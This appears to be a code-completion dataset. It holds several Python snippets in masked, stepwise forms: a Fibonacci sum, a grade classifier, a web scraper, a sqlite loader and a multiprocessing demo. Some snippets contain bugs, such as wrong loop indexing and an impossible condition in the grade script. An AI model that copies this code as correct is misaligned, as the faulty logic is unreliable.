"step-2": "<mask token>\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\n<mask token>\nprint(total)\n",
"step-3": "fib = [1, 2]\ncounter = 1\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\nfib = fib[0:len(fib) - 1]\ntotal = sum(fib)\nprint(total)\n",
"step-4": "\n# coding: utf-8\n\n# In[50]:\n\n\n## Description\n## Adds the Fibonacci numbers smaller than 4 million\n\n## Weekly Journal\n## When using while True, \"break\" MUST be used to avoid infinite loops\n\n## Questions\n## None\n\nfib=[1,2]\ncounter=1\nwhile True:\n if fib[counter]>4000000:\n flag=0\n break\n else:\n fib.append(fib[counter]+fib[counter-1])\n counter+=1\nfib=fib[0:len(fib)-1]\ntotal=sum(fib)\nprint(total)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('bob' in adict)
print('name' in adict)
for key in adict:
print('%s:%s' % (key, adict[key]))
print('%(name)s:%(age)s' % adict)
<|reserved_special_token_1|>
adict = {'name': 'bob', 'age': 23}
print('bob' in adict)
print('name' in adict)
for key in adict:
print('%s:%s' % (key, adict[key]))
print('%(name)s:%(age)s' % adict)
|
flexible
|
{
"blob_id": "aa4d872c6a529d8acf18f1c3b477bc1816ac2887",
"index": 575,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('bob' in adict)\nprint('name' in adict)\nfor key in adict:\n print('%s:%s' % (key, adict[key]))\nprint('%(name)s:%(age)s' % adict)\n",
"step-3": "adict = {'name': 'bob', 'age': 23}\nprint('bob' in adict)\nprint('name' in adict)\nfor key in adict:\n print('%s:%s' % (key, adict[key]))\nprint('%(name)s:%(age)s' % adict)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
print("calificacion de los alumnos")
lista2_calificaciones=[]
for i in range (0,5):
lista2_calificaciones.append(int(input(f"ingrese la calificacion corresponfiente al alumno")))
print(lista2_calificaciones)
for n in range(0,len(lista2_calificaciones)):
    if lista2_calificaciones[n] >=0 and lista2_calificaciones[n]<=5:
        print("valor insuficiente, repetir el curso")
    else:
        if lista2_calificaciones[n] >5 and lista2_calificaciones[n]<=7:
            print("Valor es aprobatorio")
        else:
            if lista2_calificaciones[n]>7 and lista2_calificaciones[n]<9:
                print("valor es notable")
            else:
                if lista2_calificaciones[n] >=9 and lista2_calificaciones[n]<=10:
                    print("el valor es notable")
                else:
                    print("Valor muy alto vuelvalo a intentar")
|
normal
|
{
"blob_id": "1cc9c89182f69a5f1eb9a0e7f3433dc30c8d7035",
"index": 2938,
"step-1": "<mask token>\n",
"step-2": "print('calificacion de los alumnos')\n<mask token>\nfor i in range(0, 5):\n lista2_calificaciones.append(int(input(\n f'ingrese la calificacion corresponfiente al alumno')))\n print(lista2_calificaciones)\nfor n in range(0, len(lista2_calificaciones)):\n if lista2_calificaciones[i] >= 0 and lista2_calificaciones[i] <= 5:\n print('valor insuficiente, repetir el curso')\n elif lista2_calificaciones[i] > 5 and lista2_calificaciones[i] <= 7:\n print('Valor es aprobatorio')\n elif lista2_calificaciones[i] > 7 and lista2_calificaciones[i] < 9:\n print('valor es notable')\n elif lista2_calificaciones[i] == 9 and lista2_calificaciones[i] == 10:\n print('el valor es notable')\n else:\n print('Valor muy alto vuelvalo a intentar')\n",
"step-3": "print('calificacion de los alumnos')\nlista2_calificaciones = []\nfor i in range(0, 5):\n lista2_calificaciones.append(int(input(\n f'ingrese la calificacion corresponfiente al alumno')))\n print(lista2_calificaciones)\nfor n in range(0, len(lista2_calificaciones)):\n if lista2_calificaciones[i] >= 0 and lista2_calificaciones[i] <= 5:\n print('valor insuficiente, repetir el curso')\n elif lista2_calificaciones[i] > 5 and lista2_calificaciones[i] <= 7:\n print('Valor es aprobatorio')\n elif lista2_calificaciones[i] > 7 and lista2_calificaciones[i] < 9:\n print('valor es notable')\n elif lista2_calificaciones[i] == 9 and lista2_calificaciones[i] == 10:\n print('el valor es notable')\n else:\n print('Valor muy alto vuelvalo a intentar')\n",
"step-4": "\n\nprint(\"calificacion de los alumnos\")\n\nlista2_calificaciones=[]\nfor i in range (0,5):\n lista2_calificaciones.append(int(input(f\"ingrese la calificacion corresponfiente al alumno\")))\n print(lista2_calificaciones)\n\nfor n in range(0,len(lista2_calificaciones)):\n if lista2_calificaciones[i] >=0 and lista2_calificaciones[i]<=5:\n print(\"valor insuficiente, repetir el curso\")\n else:\n if lista2_calificaciones[i] >5 and lista2_calificaciones[i]<=7:\n print(\"Valor es aprobatorio\")\n else:\n if lista2_calificaciones[i]>7 and lista2_calificaciones[i]<9:\n print(\"valor es notable\") \n else:\n if lista2_calificaciones[i] ==9 and lista2_calificaciones[i]==10:\n print(\"el valor es notable\")\n else:\n \n print(\"Valor muy alto vuelvalo a intentar\")\n \n \n \n\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .server import CanvasServer
try:
from .jupyter import JupyterCanvas, create_jupyter_canvas
HAS_JUPYTER = True
except:
HAS_JUPYTER = False
JupyterCanvas = None # type: ignore
def http_server(
file: str = None, host: str = "localhost", port: int = 5050
) -> CanvasServer:
"""Creates a new HTTP server for displaying the network, using WebSockets to
transmit data. The server will only start once its
:meth:`~server.CanvasServer.start` method is called. After the server has started,
the network can be viewed by opening a browser and navigating to the address
``http://localhost:5050/`` (change the port as necessary).
:file: (Optional) The path to the HTML file which the server should display,
relative to the current runtime directory. If unspecified, the default HTML file
will be used. When creating a custom HTML interface, use the default file as a
guide.
:type file: str
:port: (Optional) The port on which the server should start, defaulting to to 5050.
Note that the next port (by default 5051) will also be used to transmit data
through WebSockets.
:type port: int
"""
return CanvasServer(file, host, port)
def jupyter_canvas(buttons: bool = False) -> JupyterCanvas:
"""Creates a new :class:`~api.Canvas` which will dispatch and receive
events through a Jupyter widget, and which can be displayed using the IPython
``display`` function.
By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be
held down while zooming."""
if HAS_JUPYTER:
return create_jupyter_canvas(buttons=buttons)
else:
raise Exception("Jupyter is not installed")
|
normal
|
{
"blob_id": "b11e2837d3ba9c14770b8039186a2175adc41ea1",
"index": 283,
"step-1": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-3": "<mask token>\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-4": "from .server import CanvasServer\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-5": "from .server import CanvasServer\n\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None # type: ignore\n\n\ndef http_server(\n file: str = None, host: str = \"localhost\", port: int = 5050\n) -> CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool = False) -> JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception(\"Jupyter is not installed\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
res = requests.get('http://quotes.toscrape.com/')
soup = BeautifulSoup(res.text, 'lxml')
quote = soup.find_all('div', {'class': 'quote'})
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
from bs4 import BeautifulSoup
import requests
res = requests.get('http://quotes.toscrape.com/')
soup = BeautifulSoup(res.text, 'lxml')
quote = soup.find_all('div', {'class': 'quote'})
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
from bs4 import BeautifulSoup
import requests
res = requests.get('http://quotes.toscrape.com/')
#print(res.content)
#proper ordered printing
#print(res.text)
#lxml -> parser library
soup = BeautifulSoup(res.text , 'lxml')
#print(soup)
quote = soup.find_all('div',{'class' : 'quote'})
with open('Quotes.txt','w') as ff:
for q in quote:
msg = q.find('span',{'class' : 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small',{'class' : 'author'})
print(author.text)
ff.write("\n")
ff.write(author.text)
print()
ff.write("\n\n")
|
flexible
|
{
"blob_id": "777c08876a2de803fc95de937d9e921044545ef8",
"index": 3674,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-3": "<mask token>\nres = requests.get('http://quotes.toscrape.com/')\nsoup = BeautifulSoup(res.text, 'lxml')\nquote = soup.find_all('div', {'class': 'quote'})\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-4": "from bs4 import BeautifulSoup\nimport requests\nres = requests.get('http://quotes.toscrape.com/')\nsoup = BeautifulSoup(res.text, 'lxml')\nquote = soup.find_all('div', {'class': 'quote'})\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-5": "from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nres = requests.get('http://quotes.toscrape.com/')\r\n#print(res.content)\r\n#proper ordered printing\r\n#print(res.text)\r\n#lxml -> parser library\r\nsoup = BeautifulSoup(res.text , 'lxml')\r\n#print(soup)\r\n\r\nquote = soup.find_all('div',{'class' : 'quote'})\r\nwith open('Quotes.txt','w') as ff:\r\n for q in quote:\r\n msg = q.find('span',{'class' : 'text'})\r\n print(msg.text)\r\n ff.write(msg.text)\r\n author = q.find('small',{'class' : 'author'})\r\n print(author.text)\r\n ff.write(\"\\n\")\r\n ff.write(author.text)\r\n print()\r\n ff.write(\"\\n\\n\")\r\n\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
db.execute(
    'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMARY KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
db = sqlite3.connect('employee.sqlite')
db.execute(
    'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMARY KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
import requests
import sqlite3
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
db = sqlite3.connect('employee.sqlite')
db.execute(
    'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMARY KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
import requests
import sqlite3
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
# Create the employee database if it does not exist
db = sqlite3.connect('employee.sqlite')
#create the table
db.execute("CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)")
#db.execute("INSERT INTO employee(id, employee_name, employee_salary, employee_age, profile_image) VALUES(1, 'Levi', 50000, 24, '')")
# Loop through each employee information and insert into database
for employee in packages_json['data']:
db.execute("INSERT INTO employee VALUES (?, ?, ?, ?, ?)", [employee["id"], employee["employee_name"], employee["employee_salary"], employee["employee_age"],employee["profile_image"]])
db.commit()
db.close()
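# Optional sanity-check sketch (standard sqlite3 API only): re-open the file
# and count the rows that were just inserted.
#
#     check = sqlite3.connect('employee.sqlite')
#     (n,) = check.execute("SELECT COUNT(*) FROM employee").fetchone()
#     print("employee rows:", n)
#     check.close()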
|
flexible
|
{
"blob_id": "497203be99643e2bb0087977f292f4ed890f9ead",
"index": 7111,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-3": "<mask token>\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\nr = requests.get(url)\npackages_json = r.json()\ndb = sqlite3.connect('employee.sqlite')\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-4": "import requests\nimport sqlite3\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\nr = requests.get(url)\npackages_json = r.json()\ndb = sqlite3.connect('employee.sqlite')\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-5": "import requests\r\nimport sqlite3\r\n\r\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\r\n\r\nr = requests.get(url)\r\npackages_json = r.json()\r\n\r\n# Create the employee database if it does not exist\r\ndb = sqlite3.connect('employee.sqlite')\r\n#create the table\r\ndb.execute(\"CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)\")\r\n#db.execute(\"INSERT INTO employee(id, employee_name, employee_salary, employee_age, profile_image) VALUES(1, 'Levi', 50000, 24, '')\")\r\n\r\n# Loop through each employee information and insert into database\r\nfor employee in packages_json['data']:\r\n db.execute(\"INSERT INTO employee VALUES (?, ?, ?, ?, ?)\", [employee[\"id\"], employee[\"employee_name\"], employee[\"employee_salary\"], employee[\"employee_age\"],employee[\"profile_image\"]])\r\n db.commit()\r\ndb.close()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
<|reserved_special_token_1|>
from multiprocessing import Process, Queue
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
<|reserved_special_token_1|>
from multiprocessing import Process, Queue
def f(q):
for i in range(0,100):
print("come on baby")
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
# Note: the main process and the subprocess run concurrently; at j == 1800 the main process blocks on q.get() until the subprocess has put a result.
# 0
# 1
# 2
# 3
# 4
# 5
# 6
# 7
# 8
# 9
# 10
# 11
# 12
# 13
# 14
# 15
# 16
# 17
# ...
# ...
# 1276
# 1277
# 1278
# 1279
# 1280
# 1281
# 1282
# 1283
# 1284
# 1285
# 1286
# 1287
# 1288
# 1289
# 1290
# 1291
# 1292
# 1293
# 1294
# 1295
# come on baby
# 1296
# come on baby
# 1297
# come on baby
# 1298
# come on baby
# 1299
# come on baby
# 1300
# come on baby
# 1301
# come on baby
# 1302
# come on baby
# 1303
# 1304
# come on baby
# 1305
# come on baby
# 1306
# come on baby
# 1307
# come on baby
# 1308
# come on baby
# 1309
# come on baby
# 1310
# come on baby
# 1311
# come on baby
# 1312
# come on baby
# 1313
# come on baby
# 1314
# come on baby
# 1315
# come on baby
# 1316
# come on baby
# 1317
# come on baby
# 1318
# come on baby
# 1319
# come on baby
# 1320
# come on baby
# 1321
# come on baby
# 1322
# come on baby
# 1323
# come on baby
# 1324
# come on baby
# 1325
# come on baby
# 1326
# come on baby
# 1327
# come on baby
# 1328
# come on baby
# 1329
# come on baby
# 1330
# come on baby
# 1331
# come on baby
# 1332
# come on baby
# 1333
# come on baby
# 1334
# come on baby
# 1335
# come on baby
# 1336
# come on baby
# 1337
# come on baby
# 1338
# come on baby
# 1339
# come on baby
# 1340
# come on baby
# 1341
# come on baby
# 1342
# come on baby
# 1343
# come on baby
# 1344
# come on baby
# 1345
# come on baby
# 1346
# come on baby
# 1347
# come on baby
# 1348
# come on baby
# 1349
# come on baby
# 1350
# come on baby
# 1351
# come on baby
# 1352
# come on baby
# 1353
# come on baby
# 1354
# come on baby
# 1355
# come on baby
# 1356
# come on baby
# 1357
# come on baby
# 1358
# come on baby
# 1359
# come on baby
# 1360
# come on baby
# 1361
# come on baby
# 1362
# come on baby
# 1363
# come on baby
# 1364
# come on baby
# 1365
# come on baby
# 1366
# come on baby
# 1367
# come on baby
# 1368
# come on baby
# 1369
# come on baby
# 1370
# come on baby
# 1371
# come on baby
# 1372
# come on baby
# 1373
# come on baby
# 1374
# come on baby
# 1375
# come on baby
# 1376
# come on baby
# 1377
# come on baby
# 1378
# come on baby
# 1379
# come on baby
# 1380
# come on baby
# 1381
# come on baby
# 1382
# come on baby
# 1383
# come on baby
# 1384
# come on baby
# 1385
# come on baby
# 1386
# come on baby
# 1387
# come on baby
# 1388
# come on baby
# 1389
# come on baby
# 1390
# come on baby
# 1391
# come on baby
# 1392
# come on baby
# 1393
# come on baby
# 1394
# come on baby
# 1395
# come on baby
# 1396
# 1397
# 1398
# 1399
# 1400
# 1401
# 1402
# 1403
# 1404
# 1405
# ...
# ...
# 1786
# 1787
# 1788
# 1789
# 1790
# 1791
# 1792
# 1793
# 1794
# 1795
# 1796
# 1797
# 1798
# 1799
# [42, None, 'hello']
# 1800
# 1801
# 1802
# 1803
# 1804
# 1805
# 1806
# 1807
# 1808
# 1809
# ...
# ...
# 1989
# 1990
# 1991
# 1992
# 1993
# 1994
# 1995
# 1996
# 1997
# 1998
# 1999
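# Cleanup sketch: in real code, wait for the worker before the parent exits
# (standard multiprocessing API).
#
#     p.join()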
|
flexible
|
{
"blob_id": "c7258d77db2fe6e1470c972ddd94b2ed02f48003",
"index": 3390,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n",
"step-4": "from multiprocessing import Process, Queue\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n",
"step-5": "from multiprocessing import Process, Queue\n\ndef f(q):\n for i in range(0,100):\n print(\"come on baby\")\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n\n\n# 특징 main process 와 subprocess 가 각각 실행되다가 1800 에서 subprocess 가 실행될때까지 기다려줌\n\n# 0\n# 1\n# 2\n# 3\n# 4\n# 5\n# 6\n# 7\n# 8\n# 9\n# 10\n# 11\n# 12\n# 13\n# 14\n# 15\n# 16\n# 17\n\n\n# ...\n# ...\n\n\n# 1276\n# 1277\n# 1278\n# 1279\n# 1280\n# 1281\n# 1282\n# 1283\n# 1284\n# 1285\n# 1286\n# 1287\n# 1288\n# 1289\n# 1290\n# 1291\n# 1292\n# 1293\n# 1294\n# 1295\n# come on baby\n# 1296\n# come on baby\n# 1297\n# come on baby\n# 1298\n# come on baby\n# 1299\n# come on baby\n# 1300\n# come on baby\n# 1301\n# come on baby\n# 1302\n# come on baby\n# 1303\n# 1304\n# come on baby\n# 1305\n# come on baby\n# 1306\n# come on baby\n# 1307\n# come on baby\n# 1308\n# come on baby\n# 1309\n# come on baby\n# 1310\n# come on baby\n# 1311\n# come on baby\n# 1312\n# come on baby\n# 1313\n# come on baby\n# 1314\n# come on baby\n# 1315\n# come on baby\n# 1316\n# come on baby\n# 1317\n# come on baby\n# 1318\n# come on baby\n# 1319\n# come on baby\n# 1320\n# come on baby\n# 1321\n# come on baby\n# 1322\n# come on baby\n# 1323\n# come on baby\n# 1324\n# come on baby\n# 1325\n# come on baby\n# 1326\n# come on baby\n# 1327\n# come on baby\n# 1328\n# come on baby\n# 1329\n# come on baby\n# 1330\n# come on baby\n# 1331\n# come on baby\n# 1332\n# come on baby\n# 1333\n# come on baby\n# 1334\n# come on baby\n# 1335\n# come on baby\n# 1336\n# come on baby\n# 1337\n# come on baby\n# 1338\n# come on baby\n# 1339\n# come on baby\n# 1340\n# come on baby\n# 1341\n# come on baby\n# 1342\n# come on baby\n# 1343\n# come on baby\n# 1344\n# come on baby\n# 1345\n# come on baby\n# 1346\n# come on baby\n# 1347\n# come on baby\n# 1348\n# come on baby\n# 1349\n# come on baby\n# 1350\n# come on baby\n# 1351\n# come on baby\n# 1352\n# come on baby\n# 1353\n# come on baby\n# 1354\n# come on baby\n# 1355\n# come on baby\n# 1356\n# come on baby\n# 1357\n# come on baby\n# 1358\n# come on baby\n# 1359\n# come on baby\n# 1360\n# come on baby\n# 1361\n# come on baby\n# 1362\n# come on baby\n# 1363\n# come on baby\n# 1364\n# come on baby\n# 1365\n# come on baby\n# 1366\n# come on baby\n# 1367\n# come on baby\n# 1368\n# come on baby\n# 1369\n# come on baby\n# 1370\n# come on baby\n# 1371\n# come on baby\n# 1372\n# come on baby\n# 1373\n# come on baby\n# 1374\n# come on baby\n# 1375\n# come on baby\n# 1376\n# come 